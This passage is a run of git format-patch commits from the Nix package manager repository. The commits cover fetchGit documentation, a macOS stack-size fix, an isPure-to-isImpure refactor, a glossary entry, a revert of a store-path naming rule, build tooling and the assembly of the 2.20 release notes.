From 30bdee5c3b6beb88dae48771191de5d0620db6ba Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 26 Jan 2024 18:26:08 +0100 Subject: [PATCH 347/654] update docs on `fetchGit` shallow clone behavior (#9704) --- src/libexpr/primops/fetchTree.cc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index d32c264f7..a943095bb 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -614,8 +614,7 @@ static RegisterPrimOp primop_fetchGit({ - `shallow` (default: `false`) - A Boolean parameter that specifies whether fetching from a shallow remote repository is allowed. - This still performs a full clone of what is available on the remote. + Make a shallow clone when fetching the Git tree. - `allRefs` From 3a124d1e88c8cbac6fbaf4709b8b4ee92f58ff30 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 26 Jan 2024 09:40:41 -0800 Subject: [PATCH 348/654] Increase stack size on macOS as well as Linux The code works fine on macOS, but the default stack size we attempt to set is larger than what my system will allow (Nix attempts to set the stack size to 67108864, but the maximum allowed is 67092480), so I've instead used the requested stack size or the maximum allowed, whichever is smaller. I've also added an error message if setting the stack size fails. 
It looks like this: > Failed to increase stack size from 8372224 to 67108864 (maximum > allowed stack size: 67092480): Invalid argument --- src/libutil/current-process.cc | 26 +++++++++++++++++--------- src/libutil/current-process.hh | 2 +- 2 files changed, 18 insertions(+), 10 deletions(-) diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc index 352a6a0fb..01f64f211 100644 --- a/src/libutil/current-process.cc +++ b/src/libutil/current-process.cc @@ -1,3 +1,6 @@ +#include +#include + #include "current-process.hh" #include "namespaces.hh" #include "util.hh" @@ -49,20 +52,27 @@ unsigned int getMaxCPU() ////////////////////////////////////////////////////////////////////// -#if __linux__ rlim_t savedStackSize = 0; -#endif -void setStackSize(size_t stackSize) +void setStackSize(rlim_t stackSize) { - #if __linux__ struct rlimit limit; if (getrlimit(RLIMIT_STACK, &limit) == 0 && limit.rlim_cur < stackSize) { savedStackSize = limit.rlim_cur; - limit.rlim_cur = stackSize; - setrlimit(RLIMIT_STACK, &limit); + limit.rlim_cur = std::min(stackSize, limit.rlim_max); + if (setrlimit(RLIMIT_STACK, &limit) != 0) { + logger->log( + lvlError, + hintfmt( + "Failed to increase stack size from %1% to %2% (maximum allowed stack size: %3%): %4%", + savedStackSize, + stackSize, + limit.rlim_max, + std::strerror(errno) + ).str() + ); + } } - #endif } void restoreProcessContext(bool restoreMounts) @@ -72,7 +82,6 @@ void restoreProcessContext(bool restoreMounts) restoreMountNamespace(); } - #if __linux__ if (savedStackSize) { struct rlimit limit; if (getrlimit(RLIMIT_STACK, &limit) == 0) { @@ -80,7 +89,6 @@ void restoreProcessContext(bool restoreMounts) setrlimit(RLIMIT_STACK, &limit); } } - #endif } diff --git a/src/libutil/current-process.hh b/src/libutil/current-process.hh index 826d6fe20..97ea70bf4 100644 --- a/src/libutil/current-process.hh +++ b/src/libutil/current-process.hh @@ -16,7 +16,7 @@ unsigned int getMaxCPU(); /** * Change the stack size. 
*/ -void setStackSize(size_t stackSize); +void setStackSize(rlim_t stackSize); /** * Restore the original inherited Unix process context (such as signal From 772897a1cd46fc3875f0ffa54cf2661d9ef17494 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 26 Jan 2024 10:08:56 -0800 Subject: [PATCH 349/654] Color `diff` output in `tests/functional/lang` tests Use `diff --color=always` to print colored output for language test failures. I've also flipped the arguments so that expected lines missing from the actual output will be marked with a red `-` and additional lines found in the actual output will be marked with a green `+`. Previously it was the other way around, which was very confusing. --- tests/functional/lang/framework.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/lang/framework.sh b/tests/functional/lang/framework.sh index 516bff8ad..9b886e983 100644 --- a/tests/functional/lang/framework.sh +++ b/tests/functional/lang/framework.sh @@ -16,7 +16,7 @@ function diffAndAcceptInner() { fi # Diff so we get a nice message - if ! diff --unified "$got" "$expectedOrEmpty"; then + if ! diff --color=always --unified "$expectedOrEmpty" "$got"; then echo "FAIL: evaluation result of $testName not as expected" badDiff=1 fi From 1aec7771d4560d91ef97c18d9b5cdb29dde132a7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 26 Jan 2024 22:34:31 -0500 Subject: [PATCH 350/654] Add missing `#include` for `rlim_t` My local build in the shell was failing while CI was fine; not sure why that is but having the include here is definitely more correct. 
Per the POSIX spec, this is where it is supposed to be gotten https://pubs.opengroup.org/onlinepubs/009695399/basedefs/sys/resource.h.html --- src/libutil/current-process.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libutil/current-process.hh b/src/libutil/current-process.hh index 97ea70bf4..444c717d1 100644 --- a/src/libutil/current-process.hh +++ b/src/libutil/current-process.hh @@ -2,6 +2,7 @@ ///@file #include +#include #include "types.hh" From 365b831e6f290c733da6879dae871dada343a1eb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 26 Jan 2024 23:11:31 -0500 Subject: [PATCH 351/654] Minor formatting tweaks --- src/libexpr/parser-state.hh | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index a5b932ae8..0a9f076dc 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -1,19 +1,25 @@ #pragma once +///@file #include "eval.hh" namespace nix { -// using C a struct allows us to avoid having to define the special -// members that using string_view here would implicitly delete. -struct StringToken { - const char * p; - size_t l; - bool hasIndentation; - operator std::string_view() const { return {p, l}; } +/** + * @note Storing a C-style `char *` and `size_t` allows us to avoid + * having to define the special members that using string_view here + * would implicitly delete. 
+ */ +struct StringToken +{ + const char * p; + size_t l; + bool hasIndentation; + operator std::string_view() const { return {p, l}; } }; -struct ParserLocation { +struct ParserLocation +{ int first_line, first_column; int last_line, last_column; @@ -36,7 +42,8 @@ struct ParserLocation { } }; -struct ParserState { +struct ParserState +{ SymbolTable & symbols; PosTable & positions; Expr * result; From 49b25ea85c9695a0668f65bff5839aa3feccd263 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 15 Jan 2024 08:17:42 +0100 Subject: [PATCH 352/654] refactor: Impure derivation type isPure -> isImpure To quote the method doc: Non-impure derivations can still behave impurely, to the degree permitted by the sandbox. Hence why this method isn't `isPure`: impure derivations are not the negation of pure derivations. Purity can not be ascertained except by rather heavy tools. --- src/libstore/build/derivation-goal.cc | 18 +++++++++--------- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/derivations.cc | 10 +++++----- src/libstore/derivations.hh | 13 +++++++++---- 4 files changed, 24 insertions(+), 19 deletions(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index f8728ed4a..00cbf4228 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -223,7 +223,7 @@ void DerivationGoal::haveDerivation() if (!drv->type().hasKnownOutputPaths()) experimentalFeatureSettings.require(Xp::CaDerivations); - if (!drv->type().isPure()) { + if (drv->type().isImpure()) { experimentalFeatureSettings.require(Xp::ImpureDerivations); for (auto & [outputName, output] : drv->outputs) { @@ -304,7 +304,7 @@ void DerivationGoal::outputsSubstitutionTried() { trace("all outputs substituted (maybe)"); - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); if (nrFailed > 0 && nrFailed > nrNoSubstituters + nrIncompleteClosure && !settings.tryFallback) { done(BuildResult::TransientFailure, {}, 
@@ -397,9 +397,9 @@ void DerivationGoal::gaveUpOnSubstitution() for (const auto & [inputDrvPath, inputNode] : dynamic_cast(drv.get())->inputDrvs.map) { /* Ensure that pure, non-fixed-output derivations don't depend on impure derivations. */ - if (experimentalFeatureSettings.isEnabled(Xp::ImpureDerivations) && drv->type().isPure() && !drv->type().isFixed()) { + if (experimentalFeatureSettings.isEnabled(Xp::ImpureDerivations) && !drv->type().isImpure() && !drv->type().isFixed()) { auto inputDrv = worker.evalStore.readDerivation(inputDrvPath); - if (!inputDrv.type().isPure()) + if (inputDrv.type().isImpure()) throw Error("pure derivation '%s' depends on impure derivation '%s'", worker.store.printStorePath(drvPath), worker.store.printStorePath(inputDrvPath)); @@ -439,7 +439,7 @@ void DerivationGoal::gaveUpOnSubstitution() void DerivationGoal::repairClosure() { - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); /* If we're repairing, we now know that our own outputs are valid. 
Now check whether the other paths in the outputs closure are @@ -1100,7 +1100,7 @@ void DerivationGoal::resolvedFinished() worker.store.printStorePath(resolvedDrvGoal->drvPath), outputName); }(); - if (drv->type().isPure()) { + if (!drv->type().isImpure()) { auto newRealisation = realisation; newRealisation.id = DrvOutput { initialOutput->outputHash, outputName }; newRealisation.signatures.clear(); @@ -1395,7 +1395,7 @@ void DerivationGoal::flushLine() std::map> DerivationGoal::queryPartialDerivationOutputMap() { - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); if (!useDerivation || drv->type().hasKnownOutputPaths()) { std::map> res; for (auto & [name, output] : drv->outputs) @@ -1411,7 +1411,7 @@ std::map> DerivationGoal::queryPartialDeri OutputPathMap DerivationGoal::queryDerivationOutputMap() { - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); if (!useDerivation || drv->type().hasKnownOutputPaths()) { OutputPathMap res; for (auto & [name, output] : drv->outputsAndOptPaths(worker.store)) @@ -1428,7 +1428,7 @@ OutputPathMap DerivationGoal::queryDerivationOutputMap() std::pair DerivationGoal::checkPathValidity() { - if (!drv->type().isPure()) return { false, {} }; + if (drv->type().isImpure()) return { false, {} }; bool checkHash = buildMode == bmRepair; auto wantedOutputsLeft = std::visit(overloaded { diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index f85301950..2ba8be7d6 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -2724,7 +2724,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() .outPath = newInfo.path }; if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations) - && drv->type().isPure()) + && !drv->type().isImpure()) { signRealisation(thisRealisation); worker.store.registerDrvOutput(thisRealisation); diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 
2fafcb8e7..393806652 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -110,17 +110,17 @@ bool DerivationType::isSandboxed() const } -bool DerivationType::isPure() const +bool DerivationType::isImpure() const { return std::visit(overloaded { [](const InputAddressed & ia) { - return true; + return false; }, [](const ContentAddressed & ca) { - return true; + return false; }, [](const Impure &) { - return false; + return true; }, }, raw); } @@ -840,7 +840,7 @@ DrvHash hashDerivationModulo(Store & store, const Derivation & drv, bool maskOut }; } - if (!type.isPure()) { + if (type.isImpure()) { std::map outputHashes; for (const auto & [outputName, _] : drv.outputs) outputHashes.insert_or_assign(outputName, impureOutputHash); diff --git a/src/libstore/derivations.hh b/src/libstore/derivations.hh index 2a326b578..522523e45 100644 --- a/src/libstore/derivations.hh +++ b/src/libstore/derivations.hh @@ -253,12 +253,17 @@ struct DerivationType { bool isSandboxed() const; /** - * Whether the derivation is expected to produce the same result - * every time, and therefore it only needs to be built once. This is - * only false for derivations that have the attribute '__impure = + * Whether the derivation is expected to produce a different result + * every time, and therefore it needs to be rebuilt every time. This is + * only true for derivations that have the attribute '__impure = * true'. + * + * Non-impure derivations can still behave impurely, to the degree permitted + * by the sandbox. Hence why this method isn't `isPure`: impure derivations + * are not the negation of pure derivations. Purity can not be ascertained + * except by rather heavy tools. */ - bool isPure() const; + bool isImpure() const; /** * Does the derivation knows its own output paths? 
From 6a99c18c304cd199950bf32d9b9cb07c0276f0b7 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 15 Jan 2024 08:18:53 +0100 Subject: [PATCH 353/654] doc/glossary: Define impure derivation --- doc/manual/src/glossary.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 4507d8bf3..46cc5926c 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -156,6 +156,11 @@ builder can rely on external inputs such as the network or the system time) but the Nix model assumes it. +- [impure derivation]{#gloss-impure-derivation} + + [An experimental feature](#@docroot@/contributing/experimental-features.md#xp-feature-impure-derivations) that allows derivations to be explicitly marked as impure, + so that they are always rebuilt, and their outputs not reused by subsequent calls to realise them. + - [Nix database]{#gloss-nix-database} An SQlite database to track [reference]s between [store object]s. From 9ddd0f2af8fd95e1380027a70d0aa650ea2fd5e4 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 27 Jan 2024 11:18:03 +0100 Subject: [PATCH 354/654] Revert "StorePath: reject names starting with '.'" This reverts commit 24bda0c7b381e1a017023c6f7cb9661fae8560bd. 
--- src/libstore/path-regex.hh | 2 +- src/libstore/path.cc | 2 -- tests/unit/libstore-support/tests/path.cc | 8 ++------ tests/unit/libstore/path.cc | 1 - 4 files changed, 3 insertions(+), 10 deletions(-) diff --git a/src/libstore/path-regex.hh b/src/libstore/path-regex.hh index a44e6a2eb..4f8dc4c1f 100644 --- a/src/libstore/path-regex.hh +++ b/src/libstore/path-regex.hh @@ -3,6 +3,6 @@ namespace nix { -static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-_\?=][0-9a-zA-Z\+\-\._\?=]*)"; +static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-\._\?=]+)"; } diff --git a/src/libstore/path.cc b/src/libstore/path.cc index a15a78545..4361b3194 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -9,8 +9,6 @@ static void checkName(std::string_view path, std::string_view name) if (name.size() > StorePath::MaxPathLen) throw BadStorePath("store path '%s' has a name longer than %d characters", path, StorePath::MaxPathLen); - if (name[0] == '.') - throw BadStorePath("store path '%s' starts with illegal character '.'", path); // See nameRegexStr for the definition for (auto c : name) if (!((c >= '0' && c <= '9') diff --git a/tests/unit/libstore-support/tests/path.cc b/tests/unit/libstore-support/tests/path.cc index e5f169e94..bbe43bad4 100644 --- a/tests/unit/libstore-support/tests/path.cc +++ b/tests/unit/libstore-support/tests/path.cc @@ -46,12 +46,8 @@ Gen Arbitrary::arbitrary() pre += '-'; break; case 64: - // names aren't permitted to start with a period, - // so just fall through to the next case here - if (c != 0) { - pre += '.'; - break; - } + pre += '.'; + break; case 65: pre += '_'; break; diff --git a/tests/unit/libstore/path.cc b/tests/unit/libstore/path.cc index 30631b5fd..5485ab8bb 100644 --- a/tests/unit/libstore/path.cc +++ b/tests/unit/libstore/path.cc @@ -39,7 +39,6 @@ TEST_DONT_PARSE(double_star, "**") TEST_DONT_PARSE(star_first, "*,foo") TEST_DONT_PARSE(star_second, "foo,*") TEST_DONT_PARSE(bang, "foo!o") 
-TEST_DONT_PARSE(dotfile, ".gitignore") #undef TEST_DONT_PARSE From 44a0d044832050cc419d844e73b8e021b0643357 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 29 Jan 2024 05:56:19 +0100 Subject: [PATCH 355/654] add missing link (#9869) --- doc/manual/src/glossary.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 46cc5926c..13b2906f7 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -285,7 +285,7 @@ - [package attribute set]{#package-attribute-set} - An [attribute set] containing the attribute `type = "derivation";` (derivation for historical reasons), as well as other attributes, such as + An [attribute set](@docroot@/language/values.md#attribute-set) containing the attribute `type = "derivation";` (derivation for historical reasons), as well as other attributes, such as - attributes that refer to the files of a [package], typically in the form of [derivation outputs](#output), - attributes that declare something about how the package is supposed to be installed or used, - other metadata or arbitrary attributes. @@ -310,4 +310,4 @@ See the contribution guide on the [purpose and lifecycle of experimental feaures](@docroot@/contributing/experimental-features.md). 
-[Nix language]: ./language/index.md \ No newline at end of file +[Nix language]: ./language/index.md From f6719032cf7d867fe85da5916793d263670dbd8b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 15:22:44 +0100 Subject: [PATCH 356/654] Shut up a gcc warning --- tests/unit/libstore/serve-protocol.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index 597c0b570..b2fd0fb82 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -412,7 +412,7 @@ TEST_F(ServeProtoTest, handshake_log) toClient.create(); toServer.create(); - ServeProto::Version clientResult, serverResult; + ServeProto::Version clientResult; auto thread = std::thread([&]() { FdSink out { toServer.writeSide.get() }; @@ -425,7 +425,7 @@ TEST_F(ServeProtoTest, handshake_log) { FdSink out { toClient.writeSide.get() }; FdSource in { toServer.readSide.get() }; - serverResult = ServeProto::BasicServerConnection::handshake( + ServeProto::BasicServerConnection::handshake( out, in, defaultVersion); }; From baff34d728844870e62deea7847bbe1e97dfe157 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 16:30:29 +0100 Subject: [PATCH 357/654] Don't include store docs in every manpage --- doc/manual/generate-manpage.nix | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/doc/manual/generate-manpage.nix b/doc/manual/generate-manpage.nix index ae31b2a1f..ba5667a43 100644 --- a/doc/manual/generate-manpage.nix +++ b/doc/manual/generate-manpage.nix @@ -93,9 +93,6 @@ let maybeProse = # FIXME: this is a horrible hack to keep `nix help-stores` working. - # the correct answer to this is to remove that command and replace it - # by statically generated manpages or the output of something like `nix - # store info `. let help-stores = '' ${index} @@ -121,7 +118,7 @@ let }; in optionalString (details ? 
doc) ( - if match "@store-types@" details.doc != [ ] + if match ".*@store-types@.*" details.doc != null then help-stores else details.doc ); From 1ef6bbb16d61067bcfdd30f1c8910afe498cc164 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 16:50:55 +0100 Subject: [PATCH 358/654] Update release-process.md --- maintainers/release-process.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/maintainers/release-process.md b/maintainers/release-process.md index db8b064a5..da6886ea9 100644 --- a/maintainers/release-process.md +++ b/maintainers/release-process.md @@ -27,8 +27,9 @@ release: * Compile the release notes by running ```console + $ export VERSION=X.YY $ git checkout -b release-notes - $ VERSION=X.YY ./maintainers/release-notes + $ ./maintainers/release-notes ``` where `X.YY` is *without* the patch level, e.g. `2.12` rather than ~~`2.12.0`~~. From 007040080977f1a06786fd4cfa7b4b95b18c5713 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:10:42 +0100 Subject: [PATCH 359/654] maintainers/release-notes: Include changelog-d Otherwise it quietly generates an empty rl-.md --- doc/manual/src/contributing/hacking.md | 1 - flake.nix | 3 +-- maintainers/release-notes | 6 ++---- package.nix | 12 ------------ 4 files changed, 3 insertions(+), 19 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9a7623dc9..9e2470859 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -304,7 +304,6 @@ See also the [format documentation](https://github.com/haskell/cabal/blob/master ### Build process Releases have a precomputed `rl-MAJOR.MINOR.md`, and no `rl-next.md`. -Set `buildUnreleasedNotes = true;` in `flake.nix` to build the release notes on the fly. 
## Branches diff --git a/flake.nix b/flake.nix index a48e36a2f..0bc70768e 100644 --- a/flake.nix +++ b/flake.nix @@ -190,7 +190,6 @@ boehmgc = final.boehmgc-nix; libgit2 = final.libgit2-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; - changelog-d = final.changelog-d-nix; } // { # this is a proper separate downstream package, but put # here also for back compat reasons. @@ -363,7 +362,7 @@ }); packages = forAllSystems (system: rec { - inherit (nixpkgsFor.${system}.native) nix; + inherit (nixpkgsFor.${system}.native) nix changelog-d-nix; default = nix; } // (lib.optionalAttrs (builtins.elem system linux64BitSystems) { nix-static = nixpkgsFor.${system}.static.nix; diff --git a/maintainers/release-notes b/maintainers/release-notes index 34cd85a56..2d84485c1 100755 --- a/maintainers/release-notes +++ b/maintainers/release-notes @@ -1,7 +1,5 @@ -#!/usr/bin/env nix-shell -#!nix-shell -i bash ../shell.nix -I nixpkgs=channel:nixos-unstable-small -# ^^^^^^^ -# Only used for bash. shell.nix goes to the flake. +#!/usr/bin/env nix +#!nix shell .#changelog-d-nix --command bash # --- CONFIGURATION --- diff --git a/package.nix b/package.nix index 192df90ab..d1d14d10e 100644 --- a/package.nix +++ b/package.nix @@ -10,7 +10,6 @@ , boost , brotli , bzip2 -, changelog-d , curl , editline , readline @@ -88,11 +87,6 @@ # - readline , readlineFlavor ? if stdenv.hostPlatform.isWindows then "readline" else "editline" -# Whether to compile `rl-next.md`, the release notes for the next -# not-yet-released version of Nix in the manul, from the individual -# change log entries in the directory. -, buildUnreleasedNotes ? false - # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -218,9 +212,6 @@ in { ] ++ lib.optionals (doInstallCheck || enableManual) [ jq # Also for custom mdBook preprocessor. 
] ++ lib.optional stdenv.hostPlatform.isLinux util-linux - # Official releases don't have rl-next, so we don't need to compile a - # changelog - ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d ++ lib.optional enableInternalAPIDocs doxygen ; @@ -378,9 +369,6 @@ in { # Nix proper (which they depend on). (installUnitTests -> doBuild) (doCheck -> doBuild) - # We have to build the manual to build unreleased notes, as those - # are part of the manual - (buildUnreleasedNotes -> enableManual) # The build process for the manual currently requires extracting # data from the Nix executable we are trying to document. (enableManual -> doBuild) From 3089bce41b020fafd3e31034cf9f5dcf33a0b65c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:14:17 +0100 Subject: [PATCH 360/654] release notes: 2.20.0 --- ...llowed-uris-can-now-match-whole-schemes.md | 7 - doc/manual/rl-next/cgroup-stats.md | 8 - doc/manual/rl-next/drv-string-parse-hang.md | 6 - doc/manual/rl-next/empty-search-regex.md | 8 - doc/manual/rl-next/env-size-reduction.md | 7 - doc/manual/rl-next/eval-system.md | 12 - doc/manual/rl-next/git-fetcher.md | 18 - doc/manual/rl-next/hash-format-nix32.md | 23 -- doc/manual/rl-next/ifd-eval-store.md | 8 - doc/manual/rl-next/mounted-ssh-store.md | 8 - doc/manual/rl-next/nix-config-show.md | 7 - doc/manual/rl-next/nix-env-json-drv-path.md | 6 - .../rl-next/nix-flake-check-logs-actions.md | 33 -- doc/manual/rl-next/nix-hash-convert.md | 47 --- doc/manual/rl-next/nix-profile-names.md | 8 - doc/manual/rl-next/nix-store-add.md | 7 - .../rl-next/print-value-in-coercion-error.md | 24 -- .../rl-next/print-value-in-type-error.md | 23 -- .../rl-next/source-positions-in-errors.md | 42 --- .../rl-next/stack-overflow-segfaults.md | 32 -- doc/manual/rl-next/with-error-reporting.md | 31 -- doc/manual/src/SUMMARY.md.in | 1 + doc/manual/src/release-notes/rl-2.20.md | 334 ++++++++++++++++++ 23 files changed, 335 insertions(+), 365 deletions(-) delete mode 
100644 doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md delete mode 100644 doc/manual/rl-next/cgroup-stats.md delete mode 100644 doc/manual/rl-next/drv-string-parse-hang.md delete mode 100644 doc/manual/rl-next/empty-search-regex.md delete mode 100644 doc/manual/rl-next/env-size-reduction.md delete mode 100644 doc/manual/rl-next/eval-system.md delete mode 100644 doc/manual/rl-next/git-fetcher.md delete mode 100644 doc/manual/rl-next/hash-format-nix32.md delete mode 100644 doc/manual/rl-next/ifd-eval-store.md delete mode 100644 doc/manual/rl-next/mounted-ssh-store.md delete mode 100644 doc/manual/rl-next/nix-config-show.md delete mode 100644 doc/manual/rl-next/nix-env-json-drv-path.md delete mode 100644 doc/manual/rl-next/nix-flake-check-logs-actions.md delete mode 100644 doc/manual/rl-next/nix-hash-convert.md delete mode 100644 doc/manual/rl-next/nix-profile-names.md delete mode 100644 doc/manual/rl-next/nix-store-add.md delete mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md delete mode 100644 doc/manual/rl-next/print-value-in-type-error.md delete mode 100644 doc/manual/rl-next/source-positions-in-errors.md delete mode 100644 doc/manual/rl-next/stack-overflow-segfaults.md delete mode 100644 doc/manual/rl-next/with-error-reporting.md create mode 100644 doc/manual/src/release-notes/rl-2.20.md diff --git a/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md b/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md deleted file mode 100644 index 3cf75a612..000000000 --- a/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Option `allowed-uris` can now match whole schemes in URIs without slashes -prs: 9547 ---- - -If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. -Previously this only worked for schemes whose URIs used the `://` syntax. 
diff --git a/doc/manual/rl-next/cgroup-stats.md b/doc/manual/rl-next/cgroup-stats.md deleted file mode 100644 index 00853a0f8..000000000 --- a/doc/manual/rl-next/cgroup-stats.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: Include cgroup stats when building through the daemon -prs: 9598 ---- - -Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, -if both sides of the connection are this version of Nix or newer. - diff --git a/doc/manual/rl-next/drv-string-parse-hang.md b/doc/manual/rl-next/drv-string-parse-hang.md deleted file mode 100644 index 1e041d3e9..000000000 --- a/doc/manual/rl-next/drv-string-parse-hang.md +++ /dev/null @@ -1,6 +0,0 @@ ---- -synopsis: Fix handling of truncated `.drv` files. -prs: 9673 ---- - -Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. diff --git a/doc/manual/rl-next/empty-search-regex.md b/doc/manual/rl-next/empty-search-regex.md deleted file mode 100644 index b193f9456..000000000 --- a/doc/manual/rl-next/empty-search-regex.md +++ /dev/null @@ -1,8 +0,0 @@ -synopsis: Disallow empty search regex in `nix search` -prs: #9481 -description: { - -[`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. - -} - diff --git a/doc/manual/rl-next/env-size-reduction.md b/doc/manual/rl-next/env-size-reduction.md deleted file mode 100644 index 40a58bc28..000000000 --- a/doc/manual/rl-next/env-size-reduction.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Reduce eval memory usage and wall time -prs: 9658 ---- - -Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. -This reduces memory usage during eval by around 2% and wall time by around 3%. 
diff --git a/doc/manual/rl-next/eval-system.md b/doc/manual/rl-next/eval-system.md deleted file mode 100644 index a4696a56c..000000000 --- a/doc/manual/rl-next/eval-system.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -synopsis: Add new `eval-system` setting -prs: 4093 ---- - -Add a new `eval-system` option. -Unlike `system`, it just overrides the value of `builtins.currentSystem`. -This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. -In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. - -`eval-system` only takes effect if it is non-empty. -If empty (the default) `system` is used as before, so there is no breakage. diff --git a/doc/manual/rl-next/git-fetcher.md b/doc/manual/rl-next/git-fetcher.md deleted file mode 100644 index 54c0d216d..000000000 --- a/doc/manual/rl-next/git-fetcher.md +++ /dev/null @@ -1,18 +0,0 @@ ---- -synopsis: "Nix now uses `libgit2` for Git fetching" -prs: - - 9240 - - 9241 - - 9258 - - 9480 -issues: - - 5313 ---- - -Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. -The existing implementation based on the Git CLI had issues regarding reproducibility and performance. - -Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. - -Known issues: -- The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. 
diff --git a/doc/manual/rl-next/hash-format-nix32.md b/doc/manual/rl-next/hash-format-nix32.md deleted file mode 100644 index 73e6fbb24..000000000 --- a/doc/manual/rl-next/hash-format-nix32.md +++ /dev/null @@ -1,23 +0,0 @@ ---- -synopsis: Rename hash format `base32` to `nix32` -prs: 9452 ---- - -Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for -[Base32](https://en.wikipedia.org/wiki/Base32). - -## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` - -For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` -parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value -remains as a deprecated alias for `"base32"`. Please convert your code from: - -```nix -builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} -``` - -to - -```nix -builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} -``` \ No newline at end of file diff --git a/doc/manual/rl-next/ifd-eval-store.md b/doc/manual/rl-next/ifd-eval-store.md deleted file mode 100644 index 835e7e7a3..000000000 --- a/doc/manual/rl-next/ifd-eval-store.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: import-from-derivation builds the derivation in the build store -prs: 9661 ---- - -When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the 